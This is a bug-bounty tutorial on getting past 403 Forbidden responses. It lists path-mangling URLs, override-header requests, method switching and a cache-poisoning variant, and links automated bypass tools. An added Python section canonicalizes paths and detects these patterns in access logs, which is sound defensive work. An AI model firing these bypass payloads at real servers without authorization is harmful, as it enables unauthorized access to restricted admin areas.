Learn About 403 Bypass
When you do not have authorization to view a page or any other resource on a web server, you get a 403 Forbidden error. When you are bug hunting on a target, it frequently happens that you dig deep into it and hit a 403 Forbidden or Permission Denied response. Most inexperienced hunters give up at that point. However, if you can get past it, you can often reach the target's admin page or another restricted page and continue your search from there. Reporting such a bypass can also earn you a bounty.
I will walk you through a few manual bypass techniques and then point you to some Linux tools that can try these bypasses for you automatically. Let's get going.
Manually Bypass
Request Method Manipulation: convert the GET request to a POST request (or another method), in case the access rule was written only for GET.
GET /admin HTTP/1.1
Host: target.com
How to apply this
POST /admin HTTP/1.1
Host: target.com
Overriding the Target URL via Non-Standard Headers: X-Original-URL: & X-Rewrite-URL:
GET /admin HTTP/1.1
Host: target.com
How to apply this
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
OR
GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /admin
Appending %2e after the first slash:
http://target.com/admin => 403
How to apply this
http://target.com/%2e/admin => 200
Try adding a dot (.), a slash (/) or a semicolon (;) to the URL, so that the front-end access check no longer matches the path while the back end still resolves it:
http://target.com/admin => 403
How to apply this
http://target.com/secret/. => 200
http://target.com//secret// => 200
http://target.com/./secret/.. => 200
http://target.com/;/secret => 200
http://target.com/.;/secret => 200
http://target.com//;//secret => 200
Add "..;/" after the directory name:
http://target.com/admin
How to apply this
http://target.com/admin..;/
Try changing the case of letters in the URL, in case the access check is case-sensitive but the back end is not:
http://target.com/admin
How to apply this
http://target.com/aDmIN
Via Web Cache Poisoning:
GET /anything HTTP/1.1
Host: victim.com
X-Original-URL: /admin
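All of the manual tricks above (method switching, the X-Original-URL / X-Rewrite-URL override headers, %2e, extra dots, slashes and semicolons, "..;/", and case changes) work for the same underlying reason: the component that enforces the 403 matches the raw request path, while the component that serves the content resolves a normalized one. The added example below is not from the original post or from any of the listed tools; it shows the defender's side in Python: a canonicalization routine that applies those normalizations before the authorization decision, a classifier that makes the decision independent of the HTTP method and of override headers, and a small scanner that flags the same patterns in access-log lines. The protected prefixes, header list and sample log lines are constructed for the example.

```python
"""Canonicalize request paths before authorizing them, and detect 403-bypass patterns.

Added example (not from the original post). Policy values and log lines are constructed.
"""
import re
from urllib.parse import unquote

# Hypothetical policy: first path segments that require authorization.
PROTECTED_PREFIXES = ("admin", "secret")
# Headers some proxies/frameworks honour as a URL override; the authorization
# layer must not route on them (ideally the edge strips them entirely).
OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")


def canonicalize_path(raw_path: str) -> str:
    """Reduce a request path to the form a lenient back end would serve.

    In order: bounded repeated percent-decoding (so %2e becomes '.'), removal of
    ';' path parameters, dot-segment resolution, duplicate-slash collapsing and
    case folding. Matching on this string, not the raw one, closes the gaps.
    """
    path = raw_path
    for _ in range(3):                  # bounded loop: %252e also collapses to '.'
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]      # "/.;/secret" -> "/./secret"
        if seg in ("", "."):            # "//" and "/./" contribute nothing
            continue
        if seg == "..":                 # "/./secret/.." resolves back up
            if out:
                out.pop()
            continue
        out.append(seg.lower())         # "/aDmIN" -> "/admin" (case-insensitive back end assumed)
    return "/" + "/".join(out)


def is_protected(canonical_path: str) -> bool:
    """Segment-based match, so '/admin..' or '/administrator' are not treated as '/admin'."""
    first = canonical_path.strip("/").split("/")[0]
    return first in PROTECTED_PREFIXES


def classify_request(method: str, raw_path: str, headers: dict) -> dict:
    """Authorization decision plus detection signals for one request.

    The decision depends only on the canonical path: never on the method
    (GET vs POST) and never on an override header.
    """
    canonical = canonicalize_path(raw_path)
    reasons = []
    for name, value in headers.items():
        if name.lower() in OVERRIDE_HEADERS:
            reasons.append(f"override-header {name}={value}")
    if canonical != (raw_path.rstrip("/") or "/"):
        reasons.append(f"path-obfuscation {raw_path!r} -> {canonical!r}")
    return {"method": method, "canonical": canonical,
            "deny": is_protected(canonical), "suspicious": reasons}


# Combined-log-format request line and status, e.g. "GET /admin HTTP/1.1" 403
LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def scan_access_log(lines):
    """Return (raw path, canonical path, status) for obfuscated requests that
    resolved into a protected area and were answered with a 2xx status."""
    hits = []
    for line in lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        result = classify_request(m["method"], m["path"], {})
        if result["deny"] and result["suspicious"] and m["status"].startswith("2"):
            hits.append((m["path"], result["canonical"], m["status"]))
    return hits


# Constructed access-log lines for demonstration (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /admin HTTP/1.1" 403 162',
    '198.51.100.7 - - [10/Oct/2023:13:55:38 +0000] "GET /%2e/admin HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /aDmIN HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2023:13:55:41 +0000] "GET /public/index.html HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for method, path, hdrs in [("POST", "/admin", {}), ("GET", "/;/secret", {}),
                               ("GET", "/anything", {"X-Original-URL": "/admin"})]:
        print(classify_request(method, path, hdrs))
    print(scan_access_log(SAMPLE_LOG))
```

The important design choice is that `is_protected` is evaluated on the canonical path and nothing else: switching GET to POST, supplying an override header, or encoding the path differently all produce the same canonical string and therefore the same decision. The log scanner is a cheap retrospective check for the same thing: a request whose raw path differs from its canonical form, resolves into a protected area, and still received a 2xx is exactly the event a 403 bypass produces.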
Automation Bypass
Here's a list of tools I found for bypassing 40X status codes:
https://github.com/Sn1r/Forbidden-Buster
https://github.com/lobuhi/byp4xx
https://github.com/iamj0ker/bypass-403
https://github.com/gotr00t0day/forbiddenpass
https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122